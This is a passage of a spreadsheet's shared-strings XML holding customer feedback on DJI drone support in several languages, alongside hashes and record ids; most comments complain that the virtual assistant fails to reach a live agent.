    <t>|82700279621889670831140</t>
  </si>
  <si>
    <t>bKqP+TtKeTx7psJu35+jBIAp7dOGHmHXIZvlSVxFo7s=</t>
  </si>
  <si>
    <t>3dcf318b1ee377888e49383110e749a7</t>
  </si>
  <si>
    <t>|82699826512325260381389</t>
  </si>
  <si>
    <t>9BSLzVs84TQ9wzN0Dt9H8BH/Gk9r9iCz2eGCdS/cltQ=</t>
  </si>
  <si>
    <t>Need help asap</t>
  </si>
  <si>
    <t>Rhoi/mJDP51KfJeMXT3xxuvVN9IVfetyJPkEz2AHqE8=</t>
  </si>
  <si>
    <t>de2669fda0b29e7f753ae448041b62bb</t>
  </si>
  <si>
    <t>|82698713061383333491472</t>
  </si>
  <si>
    <t>F5wFlzMD+bbf9qu89be5f0P6WScSr7QRRXhgJFCQ1d8=</t>
  </si>
  <si>
    <t>Actually answer my question and not supply random completely incorrect answers</t>
  </si>
  <si>
    <t>QFTGUTpFch2BgGfcvmnQiQ==</t>
  </si>
  <si>
    <t>5ea0109e5e6c9d7fde7c1cdc4f0f0aae</t>
  </si>
  <si>
    <t>|82698805892136103749283</t>
  </si>
  <si>
    <t>H0m7D//vRP79WQF3aFHmNg==</t>
  </si>
  <si>
    <t xml:space="preserve">you will not let me ask a simple question through regular email. </t>
  </si>
  <si>
    <t>99siFtkwLdlFoDpBnN0Odp3Ka5I3Rrpg8QzTyG2k5+Q=</t>
  </si>
  <si>
    <t>79e562eb3accb6f66375f9f8e15bef39</t>
  </si>
  <si>
    <t>it_sp2</t>
  </si>
  <si>
    <t>|82698965689762138080141</t>
  </si>
  <si>
    <t>9f9SeaZxXzQHb31I/0PlALOzg7R0/8EIZbC0dDc6MdI=</t>
  </si>
  <si>
    <t>Siete fantastici,gentilissimi!cosa posso dire di più?Continuate così!</t>
  </si>
  <si>
    <t>azvaELMnzFFFVoO5733Li90rjSSg4H5C+HvN2nU85l4=</t>
  </si>
  <si>
    <t>46a3a5c4b913f1cb66986ad27bf5d542</t>
  </si>
  <si>
    <t>|82696276696723353488913</t>
  </si>
  <si>
    <t>i8SodfD5vHzEbfpobmJIA6VV5XjVr8FHzn8f3Izt61Y=</t>
  </si>
  <si>
    <t>Tty responding to questions, that would be a great start</t>
  </si>
  <si>
    <t>5YBzVoFNLnfuQLIr3L4F4hhCIxg/HA9ugxcVjZCVe+8=</t>
  </si>
  <si>
    <t>51f7582c58c9a0f99399d6befdf9ee48</t>
  </si>
  <si>
    <t>|82696792718592685779012</t>
  </si>
  <si>
    <t>oxwSxHW55+7HPAegQLwo1rmMCRwXg5owMUy9jo+RNLU=</t>
  </si>
  <si>
    <t>Can't download DJI Mavic Mini App.  Anything but...</t>
  </si>
  <si>
    <t>5RXiWb2hYUz6OqBveLoWDpxFi2iVvGWUn2OVr1KvOk0=</t>
  </si>
  <si>
    <t>82a6aeac8b452cacdc16859cee2ecff2</t>
  </si>
  <si>
    <t>|82696399104837491836823</t>
  </si>
  <si>
    <t>m9PoXsJ2Xkjqj4K8VjCMsVR7kHsn2gQAm1lSDuhvUQw=</t>
  </si>
  <si>
    <t xml:space="preserve">Understanding question and answered appropriately </t>
  </si>
  <si>
    <t>Mw8xDt/NmlT16VI1hG6mAQvfHxtFAL1DgVPlMzSrK8c=</t>
  </si>
  <si>
    <t>a629147e11fa4e13793274dd737a99b7</t>
  </si>
  <si>
    <t>|82695285484126535620094</t>
  </si>
  <si>
    <t>IdXwm2OHgALd4fWwPaXJ3Eh86tia6fN0PYMKMl4goLs=</t>
  </si>
  <si>
    <t>UNABLE TO FND THE PROBLEM</t>
  </si>
  <si>
    <t>W6JeJ00ZfREt+YUco3KLz0p4CV7CPjHcyjZWlhNq6Qg=</t>
  </si>
  <si>
    <t>88bf6cbc8d089d2c65dc5a645f743743</t>
  </si>
  <si>
    <t>|82695363571294644130981</t>
  </si>
  <si>
    <t>vF8uF0Jm1mn/iNNkFNkKlg==</t>
  </si>
  <si>
    <t>I can't talk to anyone. I just get a list of FAQ's</t>
  </si>
  <si>
    <t>+GjCIRyaS2B/2DR41mTW6om9PUwGZ2HkIR45yyvl8JQ=</t>
  </si>
  <si>
    <t>39d12bc2fc561b23e398277bb4568c1e</t>
  </si>
  <si>
    <t>na_fly1</t>
  </si>
  <si>
    <t>|82694220061422503958528</t>
  </si>
  <si>
    <t>PwjVrPg7tO09B2WdeJVeUNy7b5JRA9cEVDZPNcsBJLI=</t>
  </si>
  <si>
    <t>Could not resolve my issue.  Very frustrated overall with DJI customer service.</t>
  </si>
  <si>
    <t>dqRYo2CneJ3ccUPKJV8ItafYtyKqny3QXU3mTM9ZJtc=</t>
  </si>
  <si>
    <t>6272cd5213328a74eed9e649ed799661</t>
  </si>
  <si>
    <t>|82694546023276368379661</t>
  </si>
  <si>
    <t>m/V9qfjR+FxqvI7Y8+siR06O0EOSMUx/AEiFbzZEr90=</t>
  </si>
  <si>
    <t>Ich möchte DJI Care kaufen</t>
  </si>
  <si>
    <t>iWzsDHWZy1qqV08S5C/FNvthRfXvab6XKxIjgOATWvQ=</t>
  </si>
  <si>
    <t>4f815b0e57e34b5d2188003ba4ac23fe</t>
  </si>
  <si>
    <t>eu_sp13</t>
  </si>
  <si>
    <t>|82694308525366715564783</t>
  </si>
  <si>
    <t>oXEthpu4xj793J+Q00FAyg3BPtEbJoZKSRKMTS1mnb4=</t>
  </si>
  <si>
    <t xml:space="preserve">Everything. Completely useless. Very poor navigation to a series of dead ends and sales pitches. </t>
  </si>
  <si>
    <t>LB5hikhWglziSQAL51Zr5QLqhG9ZKN7v0p9VixUQFSk=</t>
  </si>
  <si>
    <t>f1cd194e65190ef7b9c371bbd65d0c31</t>
  </si>
  <si>
    <t>|82693664020226887824238</t>
  </si>
  <si>
    <t>qAi2nPW41lU3s0R2Zyvclg==</t>
  </si>
  <si>
    <t xml:space="preserve">After hours there ought to be a way to leave a message or send an email. </t>
  </si>
  <si>
    <t>6cdNdoANVIijdApFaL0BjDvZYAbn4V6sTizOA/rPrng=</t>
  </si>
  <si>
    <t>cf4e2a1d18adff1e36239f5c29f70001</t>
  </si>
  <si>
    <t>|82692473126885695631520</t>
  </si>
  <si>
    <t>XNGRssrmuBZoY94OKcQq36mobBtE18oDhFnkBdD3yXM=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>믕답지연</t>
    </r>
  </si>
  <si>
    <t>gAcYwdnq6i/7MctOC77CMjqYNMs/Fql5tmwYQ1NFa7k=</t>
  </si>
  <si>
    <t>64b956f99a0e059f3c97bc0650fcd9fa</t>
  </si>
  <si>
    <t>|82694346641234288498115</t>
  </si>
  <si>
    <t>KmUG61dew1dZlrvI74ycTw==</t>
  </si>
  <si>
    <t>When I click "Connect to a live agent," I should not be sent to a virtual assistant.  Dead end.</t>
  </si>
  <si>
    <t>7uy3j3ctLmxDeDHK5sp7WMMaHvQ6hHSTXoe9mALPUSY=</t>
  </si>
  <si>
    <t>448f1e33e35fac77d133a56798386118</t>
  </si>
  <si>
    <t>|82692484752295891748256</t>
  </si>
  <si>
    <t>CmiJbIqObPOa7JzhpDWfv3ZnmQY6/kN4f2pKc6sj3mw=</t>
  </si>
  <si>
    <t>40e690425b4d94cdb8d2d46ee092f2db</t>
  </si>
  <si>
    <t>|82692085043427348149028</t>
  </si>
  <si>
    <t>3aO7DjTUDl4dxq5wZJFzcZfxQ+1iPw9gBikD7gbScf8=</t>
  </si>
  <si>
    <t>Diastrous</t>
  </si>
  <si>
    <t>NfOi4iD8mQCQNkDD66bi1G/P8rluZCSWDc9ZI4BYkWA=</t>
  </si>
  <si>
    <t>6068af451e44f58c0201dbc1650695ac</t>
  </si>
  <si>
    <t>|82691688547736217420285</t>
  </si>
  <si>
    <t>nGJuqZdkEkCEGD1RDuVsmA==</t>
  </si>
  <si>
    <t>not traking my order 0017881305142</t>
  </si>
  <si>
    <t>A66fv6xmeiYcxtS80cBmisqBLL/AEsreMgNkJ7koLNw=</t>
  </si>
  <si>
    <t>e553df3e23087e81956c78c7926e040e</t>
  </si>
  <si>
    <t>|82691676868429610754804</t>
  </si>
  <si>
    <t>PsxHnfb6vOz/uNFDqti6ujEwU4crpgx/SNznkRYAk8I=</t>
  </si>
  <si>
    <t>Actually be able to answer questions instead of directing me elsewhere.</t>
  </si>
  <si>
    <t>ujC1Amn/X3sE9UNmBQix3UGBvuH6l9hhqb//YVwYIVw=</t>
  </si>
  <si>
    <t>8c1eed852accec0d886ec128d973e344</t>
  </si>
  <si>
    <t>|82691627165458682568947</t>
  </si>
  <si>
    <t>WCqByKoL1Qgn8YAv/mQd0l+MVSV8/xJ0XnCA5SxWJg8=</t>
  </si>
  <si>
    <t>Hi, I have submitted a Video Verification for Care Refresh for a DJI Neo. Thanks, Ben</t>
  </si>
  <si>
    <t>OzFAsXXSS/IpMSgdyG5ESlnINcw4jfY8zi2uipHAe1M=</t>
  </si>
  <si>
    <t>3c406699760273de79137b8704af885a</t>
  </si>
  <si>
    <t>|82692275360909679038874</t>
  </si>
  <si>
    <t>WcJTh5lH2tjugmxxzURd3A==</t>
  </si>
  <si>
    <t>I'm trying to change the ship to address of an item I've paid for with Papal, your system will not l</t>
  </si>
  <si>
    <t>V/oNi+BthSKVpcvQZ1VGpmBAN2blbboQDo0KLW7Z1UA=</t>
  </si>
  <si>
    <t>fac3ce6cc6ed868c6c4597174c1cc2e0</t>
  </si>
  <si>
    <t>|82691556704053230935307</t>
  </si>
  <si>
    <t>cvH84cczVUMJ3RzJrNwLvtFNHfe412+SSdtXhTBDcC8=</t>
  </si>
  <si>
    <t xml:space="preserve">Make it not shit. </t>
  </si>
  <si>
    <t>K5WbGSv6awxqAZIIbPhbsqlG7v6VX2TLhVSJkitPSnk=</t>
  </si>
  <si>
    <t>ee51e8aad28ab2cd43a135bf31e1f55d</t>
  </si>
  <si>
    <t>hcrepair</t>
  </si>
  <si>
    <t>|82691547172113080642274</t>
  </si>
  <si>
    <t>9vWoX4jNY0v17O/evrZKCg==</t>
  </si>
  <si>
    <t>Hi, I saw that the drone was delivered,Could you please expedite the process as soon as possible?Thx</t>
  </si>
  <si>
    <t>SGfefaKlGgbsYSmOPsnteJo5Ey+opgnqxkJt70FNteE=</t>
  </si>
  <si>
    <t>fdd1424e68b1ab6d527900e8c84e5f30</t>
  </si>
  <si>
    <t>|82691075655551299292533</t>
  </si>
  <si>
    <t>V8oFqIsx6WN7fbV8W2wqQA==</t>
  </si>
  <si>
    <t xml:space="preserve">no options to direct the query to a real person and to many options that are not related </t>
  </si>
  <si>
    <t>/FexN7biKS5tUEevZOIoeBDQ5K2tKXVDA2fnbT9MvzQ=</t>
  </si>
  <si>
    <t>6dcc03e8d79009461728b901bc0759b7</t>
  </si>
  <si>
    <t>|82690966198551921390004</t>
  </si>
  <si>
    <t>cD5A2kyWXTmO3o98t1kl6NIaMmz5kGbwOtaY8ksZAjw=</t>
  </si>
  <si>
    <t>5c9c8902e6a846be5201287de18d90f8</t>
  </si>
  <si>
    <t>|82690860621437321629739</t>
  </si>
  <si>
    <t>R4tzJQ8tbIMfbrygWUkbfEKwfkgVBfAhXyd6kNwZ0r8=</t>
  </si>
  <si>
    <t>Virtual assistant sucks here and everywhere</t>
  </si>
  <si>
    <t>Pv9odMxg2FiYyonuItqIxSjrmj1WyZCXRXGQblG4G1M=</t>
  </si>
  <si>
    <t>9bd35373e7e5dbd81425d0fa308fa809</t>
  </si>
  <si>
    <t>|82690779577843686468071</t>
  </si>
  <si>
    <t>5LAygjpO0lwgMpDJ/pniwg==</t>
  </si>
  <si>
    <t>Amazing. My issue is now resolved. Thank you</t>
  </si>
  <si>
    <t>BB+51rQLXHrm9XKt2ecHLgNnYVd2Ht/GnKDg/K/rMMc=</t>
  </si>
  <si>
    <t>f57bc7e59f8a5f7a1a24b38e262bf378</t>
  </si>
  <si>
    <t>|82690097412051633216417</t>
  </si>
  <si>
    <t>diYwVVOVlRrD0m9z1Z4Y8CFD3Z9SuK73z2/d7i6CZGg=</t>
  </si>
  <si>
    <t xml:space="preserve">irrelevant answers. </t>
  </si>
  <si>
    <t>gs9PnsTRgBBo5LfDplmMdMkT8uGUpCpC22fhFZDti5c=</t>
  </si>
  <si>
    <t>46cb87bd8820d23b5a8ca241e3a2295c</t>
  </si>
  <si>
    <t>|82687860931688070820066</t>
  </si>
  <si>
    <t>T8k+6KWywMb3yIPPrp6gTQ==</t>
  </si>
  <si>
    <t>Wanted a human, didn’t get a human. Bad bot!</t>
  </si>
  <si>
    <t>IC6UqpZpMnQ/TFa+u54VHZQZmxVaA7EqLwChqDObAdY=</t>
  </si>
  <si>
    <t>c405e2801b4b6a85bdb000204fcdb24f</t>
  </si>
  <si>
    <t>|82687236469132866537000</t>
  </si>
  <si>
    <t>lMxuFnQjC9u53T3IoPW6tg==</t>
  </si>
  <si>
    <t xml:space="preserve">Still working to get my question answered. </t>
  </si>
  <si>
    <t>5PgbLvKvVru4OjyLjMyMEZW7TbFfZMsKUyY709nVuks=</t>
  </si>
  <si>
    <t>8b66130c28aa8588e3a23f7efd55ba42</t>
  </si>
  <si>
    <t>|82686676828093149637635</t>
  </si>
  <si>
    <t>n7wNQhcMs0bxXi0ppU9Y9SWQdCHugCj3BcjmVr2/tM6ISpTigCrk+i8aFbRf9JrF</t>
  </si>
  <si>
    <t>Session was broken as assistant did not return to chat</t>
  </si>
  <si>
    <t>N75nco6iHvwr87ZIzAkht2GffcM1wA7SeGuDt7meu1k=</t>
  </si>
  <si>
    <t>fc180a199357818a92d0cd3716dba3d9</t>
  </si>
  <si>
    <t>|82686687073893408592931</t>
  </si>
  <si>
    <t>lbs0Prr7a2nFbZeQVAnVBb0HRHTwDddzLXvX7MGhm0o=</t>
  </si>
  <si>
    <t>Disgrace</t>
  </si>
  <si>
    <t>q/kV50bc+PFgOpIseZEhQcvFLy9uujPAvylKUAEXNck=</t>
  </si>
  <si>
    <t>77f5a66c05d0c955b30ada738ce8b8cb</t>
  </si>
  <si>
    <t>eu_fly1</t>
  </si>
  <si>
    <t>|82687500570165635231400</t>
  </si>
  <si>
    <t>YJGZuDZ9a2LXsb5yoLth7tD3bghVLQLrY+pS9jCpR1I=</t>
  </si>
  <si>
    <t xml:space="preserve">Actual agents to speak to or see the option to </t>
  </si>
  <si>
    <t>Q9C2lL55006OU7k5qK6h1hU0Cf+eEz4elw2AhRtm6Ck=</t>
  </si>
  <si>
    <t>9ff1194a8b2745ff6d06f558cf4441c4</t>
  </si>
  <si>
    <t>|82685668526077529084527</t>
  </si>
  <si>
    <t>uglZK+WOHtD4ppe6MFKwtyTBiW6vJqc1ox4wttATfUM=</t>
  </si>
  <si>
    <t>i had one of the best experiences, i left the call feeling that i mattered, thank you</t>
  </si>
  <si>
    <t>w+eEE1BPS9/KKpzlV00BZj6t3nb3Hor7lyLnRUMyHFs=</t>
  </si>
  <si>
    <t>04ada6b327c7d1c0a0a8876a9d30acbb</t>
  </si>
  <si>
    <t>fr_sp1</t>
  </si>
  <si>
    <t>|82686001113268232242216</t>
  </si>
  <si>
    <t>UeF96BbllQ5eZI18n9QUBQlToxoc1ehObu4SH5gWdrU=</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour , je un probleme avec la mise a jour 1.15.5 mon mavic air 2  ne fixe plus le GPS  </t>
  </si>
  <si>
    <t>Loa5wB1KqonO5bSfugra1oSph5QlT3iVTX9s+QUpIhs=</t>
  </si>
  <si>
    <t>be781230390542fff8fd934f44912ff4</t>
  </si>
  <si>
    <t>|82686197010493656272603</t>
  </si>
  <si>
    <t>T9W+jfppqFHLh+KvuhZ0KXN9DOriQLJxyeuk+jN+dVc=</t>
  </si>
  <si>
    <t>9cd5a7e6a9a28d4d3d259b89a437f1ec</t>
  </si>
  <si>
    <t>|82684758041765885345558</t>
  </si>
  <si>
    <t>kTcgAlsTC/2pn7MLbNHCWcSfffpRHs2vp3ULey4vFrM=</t>
  </si>
  <si>
    <t>Extremely confusing when all I want to do is activate</t>
  </si>
  <si>
    <t>TjF/uOJeo9t9jSg/s3SUUhTzzgZqAax3HgWPFTzRGyk=</t>
  </si>
  <si>
    <t>2ff6fdb6cd718acaa58cccfc40342319</t>
  </si>
  <si>
    <t>|82684785526066565469151</t>
  </si>
  <si>
    <t>CH7L78rNqcRWS7W4fafvdQ==</t>
  </si>
  <si>
    <t>i WANT A LIVE AGENT</t>
  </si>
  <si>
    <t>BfBrXqIydQxhAUa5GHTGIoSpj+V3OjRItrOBivnDH9w=</t>
  </si>
  <si>
    <t>2fa5512b303be62d2a262f32b9d04acf</t>
  </si>
  <si>
    <t>|82684926841651803512755</t>
  </si>
  <si>
    <t>p9GaVCV6eN4GcFeOdk4mEA==</t>
  </si>
  <si>
    <t>I couldn't get to the real person</t>
  </si>
  <si>
    <t>gNddG27/MjoT+zPnzdqlbICNTdsacx4rprc8+cEsbPg=</t>
  </si>
  <si>
    <t>035440777585f53d603421c9e796026b</t>
  </si>
  <si>
    <t>|82685178029568434168205</t>
  </si>
  <si>
    <t>gzkmXKJBrKl6DKt8XqmA4ObsjsZcMQ/iAhWvEY5flAk=</t>
  </si>
  <si>
    <t>57f5b1ac5bedbd06642e3191ecb984e9</t>
  </si>
  <si>
    <t>|82683916961526980632268</t>
  </si>
  <si>
    <t>QC2yjcb+KOjyUYAtomiPdg==</t>
  </si>
  <si>
    <t>Virtual assistants like this one are useless. I was never even able to ask my question.</t>
  </si>
  <si>
    <t>zA6Vw/EDQQZ9C+YhQIr6eYh36z5DeCkE+EndiUimqGM=</t>
  </si>
  <si>
    <t>0ee23b9871c2c1e4e7218e1f552d90e7</t>
  </si>
  <si>
    <t>|82685229541355339958871</t>
  </si>
  <si>
    <t>7cee12893b1cb1eb89524f4f336f0a83</t>
  </si>
  <si>
    <t>|82684424200668665490158</t>
  </si>
  <si>
    <t>z2fN/e3J67CMVE9kZa1nXNCGJlkLsR8LeezhjEvkYXg=</t>
  </si>
  <si>
    <t xml:space="preserve">Amazing service . Communication and knowledge and humour </t>
  </si>
  <si>
    <t>FYEAsQLUZdEHbgooEEWg0sJ3XUD5J2eq1gvy6DpDnWI=</t>
  </si>
  <si>
    <t>1d7f77c3615746be60549315d844a492</t>
  </si>
  <si>
    <t>|82685385921532233487123</t>
  </si>
  <si>
    <t>6pxpPWaOS9MxotZYsSQRTA==</t>
  </si>
  <si>
    <t xml:space="preserve">Disappointing service is taking so long to get a shipping label. Not sure why, </t>
  </si>
  <si>
    <t>itHjR+6dp0H5hrWPPVTzogFK7OoiDsepCgTc1d3K9w0=</t>
  </si>
  <si>
    <t>c0d211df24e4f87d0487e35d829365fd</t>
  </si>
  <si>
    <t>|82682835876375222773827</t>
  </si>
  <si>
    <t>rZadLybGqPRV78Oj890B4Q==</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>삼품이</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>소진되었음에도</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">... </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>주문결제를</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>받고</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">.... </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>그에</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>따른</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>비송지연에</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>실망</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>....@~@</t>
    </r>
  </si>
  <si>
    <t>LGTwETrD1/1fiyHzZEUgvZxkEBPdMWuR5k4ira6h0hk=</t>
  </si>
  <si>
    <t>12579a6cae31e341ddb2a656c4a6f4f8</t>
  </si>
  <si>
    <t>|82682945764616704398889</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>신속하고</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>친절한</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>응대는</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>만족하나</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">... </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>삼품</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>배송이</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>늦어지는</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>것에는</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>매우</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>실망</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>.....</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>ㅠㅠㅠ</t>
    </r>
  </si>
  <si>
    <t>4ccaa9751bf5d0ab144968f31bda2d27</t>
  </si>
  <si>
    <t>|82682314622069411739241</t>
  </si>
  <si>
    <t>X8lMLOQsxbYRgzOCyCMSGzQTdpmC2gZSZJyKigV9BwY=</t>
  </si>
  <si>
    <t>af284895304075b7030935c24499ef99</t>
  </si>
  <si>
    <t>|82681742352806415976484</t>
  </si>
  <si>
    <t>YP4o4rSoSCh6rWvu+pmEM8eRvXfaa3GXewRJZ76WVUU=</t>
  </si>
  <si>
    <t xml:space="preserve">Live agent </t>
  </si>
  <si>
    <t>SwhOKy65d737FoHVw65oVS7FZ7gWyhpgr+qEmivAoo0=</t>
  </si>
  <si>
    <t>766bbc99b42f7e6734ea199f6ba96c70</t>
  </si>
  <si>
    <t>|82683614170872480515432</t>
  </si>
  <si>
    <t>tzoIeBDg1jxnh7wV+kL3fdliDo86GGBT9WclskQlKf0=</t>
  </si>
  <si>
    <t>2a456e43c52cbaf05d56fdaa2cb79f72</t>
  </si>
  <si>
    <t>|82680867648181123339067</t>
  </si>
  <si>
    <t>HwO23+nnhBt5H9mlW94DgQ==</t>
  </si>
  <si>
    <t>I am sad my drone still doesn't work</t>
  </si>
  <si>
    <t>rtA6Y2CPKdNbfsJzLBy7OLcgFWbjoEuMjObQWojrz44=</t>
  </si>
  <si>
    <t>35e00475fdfd6729c3b5200ce5c155e7</t>
  </si>
  <si>
    <t>|82681433987863908345638</t>
  </si>
  <si>
    <t>Su1fHE8YqRLZ16kd1tYFTg==</t>
  </si>
  <si>
    <t xml:space="preserve">Answered promptly all my questions. </t>
  </si>
  <si>
    <t>7X66BntN1bAPnqJK7ufK9W4WPvbMROpklTxnQghNjBY=</t>
  </si>
  <si>
    <t>cbe9db9c453d5c9984ef4eb8e1e616ee</t>
  </si>
  <si>
    <t>|82679660061997902076015</t>
  </si>
  <si>
    <t>IiNaibVgibLPJpAwPXFwbaGFWO7pJ8tl2O6zSwKfYMQ=</t>
  </si>
  <si>
    <t>Shocking service fobbed off and kept waiting first and last DJI product</t>
  </si>
  <si>
    <t>afwxeOgANLGgnfxuXxmXGWYzghi4j18d3bFuLhuIQDE=</t>
  </si>
  <si>
    <t>81cd23e02cb017d56f0dca6fc0889080</t>
  </si>
  <si>
    <t>|82680169631758900029207</t>
  </si>
  <si>
    <t>VaReu3mpTbw9rHKpEfoOUBFIo47B5nK687XtCLl2aJA=</t>
  </si>
  <si>
    <t xml:space="preserve">Got my application to unlock geo zone approved </t>
  </si>
  <si>
    <t>3rljEjO5qxRdpzTo7CVY0Hs+1wN7+fk4o76zFJUs3Q0=</t>
  </si>
  <si>
    <t>4278ed364d311f6dbfc5fef273c27f18</t>
  </si>
  <si>
    <t>|82677800479011037499148</t>
  </si>
  <si>
    <t>mlTivwCqyVTy0uZaZE9BTWDA1ZWBL+7obY9krQs8Xrc=</t>
  </si>
  <si>
    <t xml:space="preserve">Clearer instructions on warranties </t>
  </si>
  <si>
    <t>yEcdn9NoPCjE9DlIgu3JYdIRgAKjrl5OBu5g/t1q3tw=</t>
  </si>
  <si>
    <t>c2909bf5e9bfa3d37ec309e418a493e8</t>
  </si>
  <si>
    <t>|82677893101992810164685</t>
  </si>
  <si>
    <t>R6aT0E3N0Amjd0CT5ss9wiDLss2hV65Ej/gygW0LfMU=</t>
  </si>
  <si>
    <t xml:space="preserve">I typed my questions three times and never connected. </t>
  </si>
  <si>
    <t>59uf5w1U6ZMtkd4DC4oLbokvQLAEUADeyyPSumn+HHI=</t>
  </si>
  <si>
    <t>ab0c91170cbec9ab29a39a5b2a85e883</t>
  </si>
  <si>
    <t>|82678036090046493041299</t>
  </si>
  <si>
